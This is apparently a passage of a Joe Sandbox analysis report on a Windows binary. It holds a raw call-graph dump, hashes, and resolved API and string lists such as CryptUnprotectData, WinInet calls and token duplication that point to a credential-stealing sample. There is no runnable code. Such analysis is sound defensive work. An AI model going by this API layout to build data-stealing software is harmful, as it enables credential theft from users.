9228->9233 9235 23916bd 9230->9235 9232 2399a77 GlobalFree 9231->9232 9236 2391663 9232->9236 9233->9219 9234->9199 9237 2399a77 GlobalFree 9235->9237 9238 2399a77 GlobalFree 9236->9238 9239 23916ca 9237->9239 9240 2391670 9238->9240 9241 2399a77 GlobalFree 9239->9241 9242 2399a77 GlobalFree 9240->9242 9243 23916d4 9241->9243 9242->9220 9244 2399a77 GlobalFree 9243->9244 9245 23916e1 9244->9245 9246 2399a77 GlobalFree 9245->9246 9246->9226 9247 2391726 9247->9199 9248 2399a77 GlobalFree 9247->9248 9250 239177a 9248->9250 9249->9199 9250->9199 9251 239744f 10 API calls 9250->9251 9251->9199 9252->9199 9254 239121f 9253->9254 9255 2391245 PathCombineW 9254->9255 9256 2391237 PathCombineW 9254->9256 9258 239127a 9255->9258 9256->9255 9259 2399a36 MultiByteToWideChar 9258->9259 9260 239136e 9258->9260 9262 23912dd 9259->9262 9260->9199 9265 2391d2c 9260->9265 9261 2391362 CloseHandle 9261->9260 9262->9261 9263 2399a36 MultiByteToWideChar 9262->9263 9264 2391332 9263->9264 9264->9261 9266 2391d48 9265->9266 9268 2391deb 9266->9268 9325 2390cf3 9266->9325 9273 23914f7 9268->9273 9329 2399c12 9268->9329 9271 2392212 DeleteFileW 9271->9273 9280 239222c 9273->9280 9274 23921d4 DeleteFileW 9274->9273 9276 2390cf3 StrCpyW 9278 2391f41 9276->9278 9277 2399a36 MultiByteToWideChar 9277->9278 9278->9273 9278->9274 9278->9276 9278->9277 9279 2399a77 GlobalFree 9278->9279 9279->9278 9281 2392249 9280->9281 9282 2390cf3 StrCpyW 9281->9282 9291 2392301 9281->9291 9283 23922ed 9282->9283 9284 23922f5 StrCpyW 9283->9284 9283->9291 9284->9291 9285 239150b 9293 2392cd4 9285->9293 9286 2399c12 GlobalFree 9286->9291 9287 23924a3 DeleteFileW 9287->9291 9288 2392794 DeleteFileW 9288->9291 9289 2390cf3 StrCpyW 9289->9291 9290 2399a36 MultiByteToWideChar 9290->9291 9291->9285 9291->9286 9291->9287 9291->9288 9291->9289 9291->9290 9292 2399a77 GlobalFree 9291->9292 9292->9291 9294 2392ced 9293->9294 9295 2399c12 GlobalFree 9294->9295 9301 2391517 9294->9301 9297 2392dc5 9295->9297 9298 2392df6 DeleteFileW 9297->9298 9302 2392e3e 9297->9302 9298->9301 9299 2392f06 DeleteFileW 9299->9301 9304 23927aa 9301->9304 9302->9299 9303 2399a77 GlobalFree 9302->9303 9303->9302 9305 23927c6 9304->9305 9306 2390cf3 StrCpyW 9305->9306 9308 2392869 9305->9308 9306->9308 9307 239152b 9307->9205 9307->9206 9308->9307 9309 2399c12 GlobalFree 9308->9309 9310 23929a0 9309->9310 9311 2392cba DeleteFileW 9310->9311 9317 23929bf 9310->9317 9311->9307 9313 2392c7c DeleteFileW 9313->9307 9315 2390cf3 StrCpyW 9315->9317 9316 2399a36 MultiByteToWideChar 9316->9317 9317->9307 9317->9313 9317->9315 9317->9316 9318 2399a77 GlobalFree 9317->9318 9318->9317 9323 2393223 9319->9323 9320 2399a77 GlobalFree 9320->9323 9321 23934d3 9321->9247 9322 2393480 FindClose 9322->9323 9323->9320 9323->9321 9323->9322 9337 2392f4b 9323->9337 9327 2390d18 9325->9327 9326 2390d5c 9326->9268 9327->9326 9328 2390d4d StrCpyW 9327->9328 9328->9326 9330 2399c2a 9329->9330 9331 23997be GlobalFree 9330->9331 9332 2399c35 9331->9332 9333 2399a77 GlobalFree 9332->9333 9334 2399c5c 9333->9334 9335 2399a77 GlobalFree 9334->9335 9336 2391f22 9335->9336 9336->9271 9336->9278 9338 2392f6d 9337->9338 9339 2399a77 GlobalFree 9338->9339 9340 2392f76 9339->9340 9341 2399a77 GlobalFree 9340->9341 9349 2392f83 9341->9349 9342 23931b3 9342->9323 9343 23931aa FindClose 9343->9342 9344 2399c12 GlobalFree 9344->9349 9345 23931ec DeleteFileW 9345->9342 9347 239303d GetFileSize 9347->9349 9348 2399a77 GlobalFree 9348->9349 9349->9342 9349->9343 9349->9344 9349->9345 9349->9347 9349->9348 9350 23931c3 9349->9350 9350->9343 9352 2395cbb 9351->9352 9353 2399a77 GlobalFree 9352->9353 9360 2395cd2 9353->9360 9354 2395cef 9354->9010 9355 2395d1f PathCombineW 9355->9360 9356 2396050 FindClose 9356->9354 9360->9354 9360->9355 9360->9356 9361 2399a77 GlobalFree 9360->9361 9362 239744f 10 API calls 9360->9362 9363 2396068 9360->9363 9374 239629a 9360->9374 9386 2396787 9360->9386 9361->9360 9362->9360 9364 2396081 9363->9364 9368 2396267 9363->9368 9365 2399c12 GlobalFree 9364->9365 9369 23960bf 9365->9369 9367 239625c DeleteFileW 9367->9368 9368->9360 9369->9367 9370 2396113 DeleteFileW 9369->9370 9372 2396133 9369->9372 9370->9368 9371 2396242 9371->9367 9372->9371 9373 2399a77 GlobalFree 9372->9373 9373->9372 9375 23962b3 9374->9375 9381 23963d8 9374->9381 9376 2399c12 GlobalFree 9375->9376 9377 239631d 9376->9377 9378 239676b DeleteFileW 9377->9378 9384 239633d 9377->9384 9378->9381 9381->9360 9382 2396722 CloseHandle DeleteFileW 9382->9381 9383 23959dc MultiByteToWideChar 9383->9384 9384->9381 9384->9382 9384->9383 9385 2399a77 GlobalFree 9384->9385 9385->9384 9387 239679c 9386->9387 9388 2396908 9386->9388 9389 2399c12 GlobalFree 9387->9389 9388->9360 9392 23967d7 9389->9392 9391 23968fd DeleteFileW 9391->9388 9392->9391 9393 239682f DeleteFileW 9392->9393 9396 239684f 9392->9396 9393->9388 9394 23968e9 9394->9391 9395 2399a77 GlobalFree 9395->9396 9396->9394 9396->9395 9407 239a714 9397->9407 9398 239aa5a 9398->9016 9399 239aa49 FindClose 9399->9398 9401 239a6eb GlobalFree 9401->9407 9402 2399c12 GlobalFree 9402->9407 9403 239aa25 DeleteFileW 9403->9407 9404 239a87b GetFileSize 9404->9407 9405 2399a77 GlobalFree 9405->9407 9407->9398 9407->9399 9407->9401 9407->9402 9407->9403 9407->9404 9407->9405 9408 239a98a CloseHandle DeleteFileW 9407->9408 9409 239981e 9407->9409 9408->9407 9411 2399843 9409->9411 9410 239993a 9410->9407 9411->9410 9412 2399a77 GlobalFree 9411->9412 9412->9411 9414 239a39a SHGetSpecialFolderPathW 9413->9414 9418 239a392 9413->9418 9416 239a3cf 9414->9416 9417 2399a77 GlobalFree 9416->9417 9427 239a3fd 9417->9427 9418->9022 9419 239a6cc FindClose 9419->9418 9421 239a37a GlobalFree 9421->9427 9422 239a50a SHGetSpecialFolderPathW 9422->9427 9423 239981e GlobalFree 9423->9427 9424 2399a77 GlobalFree 9424->9427 9425 2399c12 GlobalFree 9425->9427 9426 239a67a DeleteFileW 9426->9427 9427->9418 9427->9419 9427->9421 9427->9422 9427->9423 9427->9424 9427->9425 9427->9426 9428 239a621 GetFileSize 9427->9428 9428->9427 9437 2394871 9429->9437 9430 23948ac 9430->9037 9431 2394b0f FindClose 9431->9430 9433 239484e GlobalFree 9433->9437 9434 239981e GlobalFree 9434->9437 9435 2399a77 GlobalFree 9435->9437 9436 2399c12 GlobalFree 9436->9437 9437->9430 9437->9431 9437->9433 9437->9434 9437->9435 9437->9436 9438 2394ac3 CloseHandle DeleteFileW 9437->9438 9438->9437 8062 40776f 8153 40100b LoadLibraryW 8062->8153 8066 407793 8177 404027 8066->8177 8069 4077f6 ExitProcess 8070 4077eb CreateMutexW 8071 4077fe 8070->8071 8600 40a0be GetCurrentProcess OpenProcessToken 8071->8600 8073 407803 8606 408619 8073->8606 8154 401027 GetProcAddress 8153->8154 8155 40177d CoInitialize 8153->8155 8156 401044 LoadLibraryW 8154->8156 8175 40a4c2 8155->8175 8158 401073 LoadLibraryW 8156->8158 8160 4010a3 LoadLibraryW GetProcAddress 8158->8160 8161 4010ca GetProcAddress 8160->8161 8163 4012aa GetProcAddress 8161->8163 8165 40137c GetProcAddress 8163->8165 8167 4014de GetProcAddress 8165->8167 8168 4014ff GetProcAddress 8167->8168 8170 4015d4 GetProcAddress 8168->8170 8172 401709 GetProcAddress 8170->8172 8173 401727 GetProcAddress GetProcAddress 8172->8173 8173->8155 8176 40a4cf LocalAlloc MultiByteToWideChar 8175->8176 8176->8066 8612 409f79 LocalAlloc 8177->8612 8180 409f79 LocalAlloc 8181 404051 8180->8181 8182 409f79 LocalAlloc 8181->8182 8183 404067 8182->8183 8184 409f79 LocalAlloc 8183->8184 8185 40407d 8184->8185 8186 409f79 LocalAlloc 8185->8186 8187 404093 8186->8187 8188 409f79 LocalAlloc 8187->8188 8189 4040a9 8188->8189 8190 409f79 LocalAlloc 8189->8190 8191 4040bf 8190->8191 8192 409f79 LocalAlloc 8191->8192 8193 4040d5 8192->8193 8194 409f79 LocalAlloc 8193->8194 8195 4040eb 8194->8195 8196 409f79 LocalAlloc 8195->8196 8197 404101 8196->8197 8198 409f79 LocalAlloc 8197->8198 8199 404117 8198->8199 8200 409f79 LocalAlloc 8199->8200 8201 40412d 8200->8201 8202 409f79 LocalAlloc 8201->8202 8203 404145 8202->8203 8204 409f79 LocalAlloc 8203->8204 8205 40415b 8204->8205 8206 409f79 LocalAlloc 8205->8206 8207 404171 8206->8207 8208 409f79 LocalAlloc 8207->8208 8209 404187 8208->8209 8210 409f79 LocalAlloc 8209->8210 8211 4041a0 8210->8211 8212 409f79 LocalAlloc 8211->8212 8213 4041ba 8212->8213 8214 409f79 LocalAlloc 8213->8214 8215 4041cf 8214->8215 8216 409f79 LocalAlloc 8215->8216 8217 4041e4 8216->8217 8218 409f79 LocalAlloc 8217->8218 8219 4041f9 8218->8219 8220 409f79 LocalAlloc 8219->8220 8221 40420e 8220->8221 8222 409f79 LocalAlloc 8221->8222 8223 404223 8222->8223 8224 409f79 LocalAlloc 8223->8224 8225 404238 8224->8225 8226 409f79 LocalAlloc 8225->8226 8227 40424d 8226->8227 8228 409f79 LocalAlloc 8227->8228 8229 40425f 8228->8229 8230 409f79 LocalAlloc 8229->8230 8231 404274 8230->8231 8232 409f79 LocalAlloc 8231->8232 8233 40428a 8232->8233 8234 409f79 LocalAlloc 8233->8234 8235 4042a0 8234->8235 8236 409f79 LocalAlloc 8235->8236 8237 4042b8 8236->8237 8238 409f79 LocalAlloc 8237->8238 8239 4042ce 8238->8239 8240 409f79 LocalAlloc 8239->8240 8241 4042e4 8240->8241 8242 409f79 LocalAlloc 8241->8242 8243 4042fc 8242->8243 8244 409f79 LocalAlloc 8243->8244 8245 404312 8244->8245 8246 409f79 LocalAlloc 8245->8246 8247 404328 8246->8247 8248 409f79 LocalAlloc 8247->8248 8249 40433e 8248->8249 8250 409f79 LocalAlloc 8249->8250 8251 404354 8250->8251 8252 409f79 LocalAlloc 8251->8252 8253 40436a 8252->8253 8254 409f79 LocalAlloc 8253->8254 8255 404380 8254->8255 8256 409f79 LocalAlloc 8255->8256 8257 404396 8256->8257 8258 409f79 LocalAlloc 8257->8258 8259 4043ac 8258->8259 8260 409f79 LocalAlloc 8259->8260 8261 4043c4 8260->8261 8262 409f79 LocalAlloc 8261->8262 8263 4043d9 8262->8263 8264 409f79 LocalAlloc 8263->8264 8265 4043ef 8264->8265 8266 409f79 LocalAlloc 8265->8266 8267 404404 8266->8267 8268 409f79 LocalAlloc 8267->8268 8269 40441a 8268->8269 8270 409f79 LocalAlloc 8269->8270 8271 404430 8270->8271 8272 409f79 LocalAlloc 8271->8272 8273 404446 8272->8273 8274 409f79 LocalAlloc 8273->8274 8275 40445f 8274->8275 8276 409f79 LocalAlloc 8275->8276 8277 404474 8276->8277 8278 409f79 LocalAlloc 8277->8278 8279 40448a 8278->8279 8280 409f79 LocalAlloc 8279->8280 8281 4044a0 8280->8281 8282 409f79 LocalAlloc 8281->8282 8283 4044b6 8282->8283 8284 409f79 LocalAlloc 8283->8284 8285 4044cb 8284->8285 8286 409f79 LocalAlloc 8285->8286 8287 4044e3 8286->8287 8288 409f79 LocalAlloc 8287->8288 8289 4044f9 8288->8289 8290 409f79 LocalAlloc 8289->8290 8291 40450f 8290->8291 8292 409f79 LocalAlloc 8291->8292 8293 404525 8292->8293 8294 409f79 LocalAlloc 8293->8294 8295 40453b 8294->8295 8296 409f79 LocalAlloc 8295->8296 8297 404551 8296->8297 8298 409f79 LocalAlloc 8297->8298 8299 404567 8298->8299 8300 409f79 LocalAlloc 8299->8300 8301 40457d 8300->8301 8302 409f79 LocalAlloc 8301->8302 8303 404593 8302->8303 8304 409f79 LocalAlloc 8303->8304 8305 4045a9 8304->8305 8306 409f79 LocalAlloc 8305->8306 8307 4045c2 8306->8307 8308 409f79 LocalAlloc 8307->8308 8309 4045d8 8308->8309 8310 409f79 LocalAlloc 8309->8310 8311 4045ee 8310->8311 8312 409f79 LocalAlloc 8311->8312 8313 404604 8312->8313 8314 409f79 LocalAlloc 8313->8314 8315 40461a 8314->8315 8316 409f79 LocalAlloc 8315->8316 8317 40462f 8316->8317 8318 409f79 LocalAlloc 8317->8318 8319 404645 8318->8319 8320 409f79 LocalAlloc 8319->8320 8321 40465b 8320->8321 8322 409f79 LocalAlloc 8321->8322 8323 404671 8322->8323 8324 409f79 LocalAlloc 8323->8324 8325 404687 8324->8325 8326 409f79 LocalAlloc 8325->8326 8327 40469d 8326->8327 8328 409f79 LocalAlloc 8327->8328 8329 4046b3 8328->8329 8330 409f79 LocalAlloc 8329->8330 8331 4046c9 8330->8331 8332 409f79 LocalAlloc 8331->8332 8333 4046df 8332->8333 8334 409f79 LocalAlloc 8333->8334 8335 4046f5 8334->8335 8336 409f79 LocalAlloc 8335->8336 8337 40470b 8336->8337 8338 409f79 LocalAlloc 8337->8338 8339 404723 8338->8339 8340 409f79 LocalAlloc 8339->8340 8341 404739 8340->8341 8342 409f79 LocalAlloc 8341->8342 8343 40474f 8342->8343 8344 409f79 LocalAlloc 8343->8344 8345 404765 8344->8345 8346 409f79 LocalAlloc 8345->8346 8347 40477b 8346->8347 8348 409f79 LocalAlloc 8347->8348 8349 404791 8348->8349 8350 409f79 LocalAlloc 8349->8350 8351 4047a7 8350->8351 8352 409f79 LocalAlloc 8351->8352 8353 4047bd 8352->8353 8354 409f79 LocalAlloc 8353->8354 8355 4047d2 8354->8355 8356 409f79 LocalAlloc 8355->8356 8357 4047e8 8356->8357 8358 409f79 LocalAlloc 8357->8358 8359 4047fd 8358->8359 8360 409f79 LocalAlloc 8359->8360 8361 404813 8360->8361 8362 409f79 LocalAlloc 8361->8362 8363 404829 8362->8363 8364 409f79 LocalAlloc 8363->8364 8365 40483f 8364->8365 8366 409f79 LocalAlloc 8365->8366 8367 404855 8366->8367 8368 409f79 LocalAlloc 8367->8368 8369 40486b 8368->8369 8370 409f79 LocalAlloc 8369->8370 8371 404883 8370->8371 8372 409f79 LocalAlloc 8371->8372 8373 404898 8372->8373 8374 409f79 LocalAlloc 8373->8374 8375 4048ae 8374->8375 8376 409f79 LocalAlloc 8375->8376 8377 4048c4 8376->8377 8378 409f79 LocalAlloc 8377->8378 8379 4048da 8378->8379 8380 409f79 LocalAlloc 8379->8380 8381 4048f0 8380->8381 8382 409f79 LocalAlloc 8381->8382 8383 404905 8382->8383 8384 409f79 LocalAlloc 8383->8384 8385 40491b 8384->8385 8386 409f79 LocalAlloc 8385->8386 8387 404931 8386->8387 8388 409f79 LocalAlloc 8387->8388 8389 404947 8388->8389 8390 409f79 LocalAlloc 8389->8390 8391 40495d 8390->8391 8392 409f79 LocalAlloc 8391->8392 8393 404973 8392->8393 8394 409f79 LocalAlloc 8393->8394 8395 404988 8394->8395 8396 409f79 LocalAlloc 8395->8396 8397 40499e 8396->8397 8398 409f79 LocalAlloc 8397->8398 8399 4049b4 8398->8399 8400 409f79 LocalAlloc 8399->8400 8401 4049c9 8400->8401 8402 40a4c2 2 API calls 8401->8402 8403 4049dc 8402->8403 8404 40a4c2 2 API calls 8403->8404 8405 4049ec 8404->8405 8406 40a4c2 2 API calls 8405->8406 8407 4049fc 8406->8407 8408 40a4c2 2 API calls 8407->8408 8409 404a0c 8408->8409 8410 40a4c2 2 API calls 8409->8410 8411 404a1c 8410->8411 8412 40a4c2 2 API calls 8411->8412 8413 404a2c 8412->8413 8414 40a4c2 2 API calls 8413->8414 8415 404a3c 8414->8415 8416 40a4c2 2 API calls 8415->8416 8417 404a4c 8416->8417 8418 40a4c2 2 API calls 8417->8418 8419 404a5c 8418->8419 8420 40a4c2 2 API calls 8419->8420 8421 404a6c 8420->8421 8422 40a4c2 2 API calls 8421->8422 8423 404a7c 8422->8423 8424 40a4c2 2 API calls 8423->8424 8425 404a8c 8424->8425 8426 40a4c2 2 API calls 8425->8426 8427 404a9c 8426->8427 8428 40a4c2 2 API calls 8427->8428 8429 404aac 8428->8429 8430 40a4c2 2 API calls 8429->8430 8431 404abc 8430->8431 8432 40a4c2 2 API calls 8431->8432 8433 404acc 8432->8433 8434 40a4c2 2 API calls 8433->8434 8435 404adc 8434->8435 8436 40a4c2 2 API calls 8435->8436 8437 404aec 8436->8437 8438 40a4c2 2 API calls 8437->8438 8439 404afc 8438->8439 8440 40a4c2 2 API calls 8439->8440 8441 404b0c 8440->8441 8442 40a4c2 2 API calls 8441->8442 8443 404b1c 8442->8443 8444 40a4c2 2 API calls 8443->8444 8445 404b2c 8444->8445 8446 40a4c2 2 API calls 8445->8446 8447 404b3c 8446->8447 8448 40a4c2 2 API calls 8447->8448 8449 404b4c 8448->8449 8450 40a4c2 2 API calls 8449->8450 8451 404b5c 8450->8451 8452 40a4c2 2 API calls 8451->8452 8453 404b6c 8452->8453 8454 40a4c2 2 API calls 8453->8454 8455 404b7c 8454->8455 8456 40a4c2 2 API calls 8455->8456 8457 404b8c 8456->8457 8458 40a4c2 2 API calls 8457->8458 8459 404b9c 8458->8459 8460 40a4c2 2 API calls 8459->8460 8461 404bac 8460->8461 8462 40a4c2 2 API calls 8461->8462 8463 404bbc 8462->8463 8464 40a4c2 2 API calls 8463->8464 8465 404bcc 8464->8465 8466 40a4c2 2 API calls 8465->8466 8467 404bdc 8466->8467 8468 40a4c2 2 API calls 8467->8468 8469 404bec 8468->8469 8470 40a4c2 2 API calls 8469->8470 8471 404bfc 8470->8471 8472 40a4c2 2 API calls 8471->8472 8473 404c0c 8472->8473 8474 40a4c2 2 API calls 8473->8474 8475 404c1c 8474->8475 8476 40a4c2 2 API calls 8475->8476 8477 404c2c 8476->8477 8478 40a4c2 2 API calls 8477->8478 8479 404c3c 8478->8479 8480 40a4c2 2 API calls 8479->8480 8481 404c4c 8480->8481 8482 40a4c2 2 API calls 8481->8482 8483 404c5c 8482->8483 8484 40a4c2 2 API calls 8483->8484 8485 404c6c 8484->8485 8486 40a4c2 2 API calls 8485->8486 8487 404c7c 8486->8487 8488 40a4c2 2 API calls 8487->8488 8489 404c8c 8488->8489 8490 40a4c2 2 API calls 8489->8490 8491 404c9c 8490->8491 8492 40a4c2 2 API calls 8491->8492 8493 404cac 8492->8493 8494 40a4c2 2 API calls 8493->8494 8495 404cbc 8494->8495 8496 40a4c2 2 API calls 8495->8496 8497 404ccc 8496->8497 8498 40a4c2 2 API calls 8497->8498 8499 404cdc 8498->8499 8500 40a4c2 2 API calls 8499->8500 8501 404cec 8500->8501 8502 40a4c2 2 API calls 8501->8502 8503 404cfc 8502->8503 8504 40a4c2 2 API calls 8503->8504 8505 404d0c 8504->8505 8506 40a4c2 2 API calls 8505->8506 8507 404d1c 8506->8507 8508 40a4c2 2 API calls 8507->8508 8509 404d2c 8508->8509 8510 40a4c2 2 API calls 8509->8510 8511 404d3c 8510->8511 8512 40a4c2 2 API calls 8511->8512 8513 404d4c 8512->8513 8514 40a4c2 2 API calls 8513->8514 8515 404d5c 8514->8515 8516 40a4c2 2 API calls 8515->8516 8517 404d6c 8516->8517 8518 40a4c2 2 API calls 8517->8518 8519 404d7c 8518->8519 8520 40a4c2 2 API calls 8519->8520 8521 404d8c 8520->8521 8522 40a4c2 2 API calls 8521->8522 8523 404d9c 8522->8523 8524 40a4c2 2 API calls 8523->8524 8525 404dac 8524->8525 8526 40a4c2 2 API calls 8525->8526 8527 404dbc 8526->8527 8528 40a4c2 2 API calls 8527->8528 8529 404dcc 8528->8529 8530 40a4c2 2 API calls 8529->8530 8531 404ddc 8530->8531 8532 40a4c2 2 API calls 8531->8532 8533 404dec 8532->8533 8534 40a4c2 2 API calls 8533->8534 8535 404dfc 8534->8535 8536 40a4c2 2 API calls 8535->8536 8537 404e07 8536->8537 8538 40a4c2 2 API calls 8537->8538 8539 404e12 8538->8539 8540 40a4c2 2 API calls 8539->8540 8541 404e1d 8540->8541 8542 40a4c2 2 API calls 8541->8542 8543 404e28 8542->8543 8544 40a4c2 2 API calls 8543->8544 8545 404e33 8544->8545 8546 40a4c2 2 API calls 8545->8546 8547 404e3e 8546->8547 8548 40a4c2 2 API calls 8547->8548 8549 404e49 8548->8549 8550 40a4c2 2 API calls 8549->8550 8551 404e54 8550->8551 8552 40a4c2 2 API calls 8551->8552 8553 404e5f 8552->8553 8554 40a4c2 2 API calls 8553->8554 8555 404e6a 8554->8555 8556 40a4c2 2 API calls 8555->8556 8557 404e75 8556->8557 8558 40a4c2 2 API calls 8557->8558 8559 404e80 8558->8559 8560 40a4c2 2 API calls 8559->8560 8561 404e8b 8560->8561 8562 40a4c2 2 API calls 8561->8562 8563 404e96 8562->8563 8564 40a4c2 2 API calls 8563->8564 8565 404ea1 8564->8565 8566 40a4c2 2 API calls 8565->8566 8567 404eb1 8566->8567 8568 40a4c2 2 API calls 8567->8568 8569 404ec1 8568->8569 8570 40a4c2 2 API calls 8569->8570 8571 404ecc 8570->8571 8572 40a4c2 2 API calls 8571->8572 8573 404ed7 8572->8573 8574 40a4c2 2 API calls 8573->8574 8575 404ee2 8574->8575 8576 40a4c2 2 API calls 8575->8576 8577 404eed 8576->8577 8578 40a4c2 2 API calls 8577->8578 8579 404ef8 8578->8579 8580 40a4c2 2 API calls 8579->8580 8581 404f03 8580->8581 8582 40a4c2 2 API calls 8581->8582 8583 404f0e 8582->8583 8584 40a4c2 2 API calls 8583->8584 8585 404f19 8584->8585 8586 40a4c2 2 API calls 8585->8586 8587 404f24 8586->8587 8588 40a4c2 2 API calls 8587->8588 8589 404f2f 8588->8589 8590 40a4c2 2 API calls 8589->8590 8591 404f3a 8590->8591 8592 40a4c2 2 API calls 8591->8592 8593 404f45 8592->8593 8594 40a4c2 2 API calls 8593->8594 8595 404f55 8594->8595 8596 40a4c2 2 API calls 8595->8596 8597 404f65 8596->8597 8598 40a4c2 2 API calls 8597->8598 8599 404f75 8598->8599 8599->8069 8599->8070 8601 40a0e7 8600->8601 8602 40a169 8600->8602 8603 40a102 GetLastError 8601->8603 8604 40a10d 8601->8604 8602->8073 8603->8602 8603->8604 8604->8602 8605 40a15e GlobalFree 8604->8605 8605->8602 8607 40862a 8606->8607 8614 40a503 lstrlenW lstrlenW 8607->8614 8609 408633 8610 40a503 3 API calls 8609->8610 8611 40863f 8610->8611 8613 40403b 8612->8613 8613->8180 8615 40a535 8614->8615 8616 40a54d GlobalFree 8615->8616 8616->8609

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
                                                                                                                                                                        • LoadLibraryW.KERNELBASE(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
                                                                                                                                                                        • LoadLibraryW.KERNELBASE(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
                                                                                                                                                                        • LoadLibraryW.KERNELBASE(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,HeapFree), ref: 00401297
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,Sleep), ref: 00401369
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,StrToIntA), ref: 004014CB
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,StrToInt64ExW), ref: 004014E9
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CharUpperW), ref: 004015C1
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetOpenUrlA), ref: 004016F6
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFileExW), ref: 00401714
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,HttpQueryInfoA), ref: 00401768
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,HttpQueryInfoW), ref: 00401774
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                        • String ID: iet$@iet$Advapi32.dll$Bcrypt.dll$CharUpperW$CloseHandle$CoCreateInstance$CoInitialize$ConvertSidToStringSidW$CopyFileW$CreateFileW$CreateMutexW$CreateProcessWithTokenW$CreateToolhelp32Snapshot$Crypt32.dll$CryptBinaryToStringW$CryptStringToBinaryA$CryptStringToBinaryW$CryptUnprotectData$DeleteFileW$DuplicateTokenEx$EnumDisplayDevicesW$ExitProcess$FindClose$FindFirstFileW$FindNextFileW$FreeLibrary$GetClientRect$GetCurrentProcess$GetDC$GetDesktopWindow$GetDriveTypeW$GetEnvironmentVariableW$GetFileSize$GetLastError$GetLocaleInfoW$GetLogicalDriveStringsW$GetModuleFileNameW$GetProcAddress$GetSystemInfo$GetSystemMetrics$GetSystemWow64DirectoryW$GetTimeZoneInformation$GetTokenInformation$GetUserDefaultLCID$GetUserDefaultLocaleName$GetUserNameW$GlobalAlloc$GlobalFree$GlobalMemoryStatusEx$HeapFree$HttpOpenRequestW$HttpQueryInfoA$HttpQueryInfoW$HttpSendRequestW$InternetCloseHandle$InternetConnectW$InternetOpenUrlA$InternetOpenUrlW$InternetOpenW$InternetReadFile$InternetReadFileExW$InternetSetOptionW$LoadLibraryW$LocalAlloc$LocalFree$MultiByteToWideChar$Ole32.dll$OpenMutexW$OpenProcess$OpenProcessToken$PathCombineW$PathMatchSpecW$Process32First$Process32Next$ReadFile$RegCloseKey$RegEnumKeyExW$RegOpenKeyExW$RegQueryValueExW$ReleaseDC$SHGetFolderPathW$SHGetSpecialFolderPathW$SetCurrentDirectoryW$SetEnvironmentVariableW$Shell32.dll$ShellExecuteW$Shlwapi.dll$Sleep$StrCpyW$StrRChrW$StrStrA$StrStrIW$StrStrW$StrToInt64ExW$StrToIntA$StrToIntW$SystemFunction036$User32.dll$WideCharToMultiByte$WinInet.dll$WriteFile$kernel32.dll$lstrcmpA$lstrcmpW$lstrcmpiW$lstrcpyA$lstrcpynA$lstrlenA$lstrlenW$pXet$wsprintfW
                                                                                                                                                                        • API String ID: 2238633743-3145191875
                                                                                                                                                                        • Opcode ID: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
                                                                                                                                                                        • Instruction ID: 478e95b91b71f65d022eb20dd3102177344006f4c0d5f92c9651a9cba786d8dc
                                                                                                                                                                        • Opcode Fuzzy Hash: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
                                                                                                                                                                        • Instruction Fuzzy Hash: 99125671645220EFD340DFBAEFC1E6937E8AB497003105D36B624F72A1D7B899218B5E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 97 40776f-4077ae call 40100b CoInitialize call 40a4c2 call 404027 105 4077b0 97->105 106 4077d4-4077e9 97->106 107 4077b5-4077c7 105->107 109 4077f6-4077f8 ExitProcess 106->109 110 4077eb-407805 CreateMutexW call 40a0be 106->110 107->106 112 4077c9-4077d2 107->112 116 407807 call 40a1fe 110->116 117 40780c-407924 call 409fd3 * 5 call 408619 call 40a5fa call 40a672 call 40a503 * 5 110->117 112->106 112->107 116->117 153 407927-407941 call 40a4c2 117->153 157 407951-407974 call 407c62 153->157 158 407943-40794f call 40a503 153->158 164 407995-40799e 157->164 165 407976-40797e 157->165 158->157 171 4079a6-4079d3 call 40a24a 164->171 168 407980 165->168 169 407987-407991 165->169 168->169 169->153 170 407993 169->170 170->171 177 407c45-407c57 ExitProcess 171->177 178 4079d9-4079f5 call 40864c 171->178 184 4079f7-407a33 call 40a3e4 178->184 185 4079ff-407a01 ExitProcess 178->185 191 407a35-407a37 ExitProcess 184->191 192 407a3d-407b2d call 40a503 * 5 SetCurrentDirectoryW GetEnvironmentVariableW call 40a503 * 2 SetEnvironmentVariableW call 409906 184->192 217 407b3a-407b4b 192->217 218 407b2f-407b39 call 403f9d 192->218 222 407b94-407be5 call 40a7da call 40abd8 call 4055b6 call 409bd9 call 404f7e LocalAlloc call 408a42 217->222 223 407b4d-407b75 SHGetSpecialFolderPathW call 4065d8 217->223 218->217 245 407bf0-407c05 call 4073c7 222->245 246 407be7-407beb call 408add 222->246 231 407b77-407b88 call 40633e 223->231 232 407b8a 223->232 235 407b8d 231->235 232->235 235->222 251 407c07-407c08 FreeLibrary 245->251 252 407c0e-407c24 DeleteFileW 245->252 246->245 251->252 254 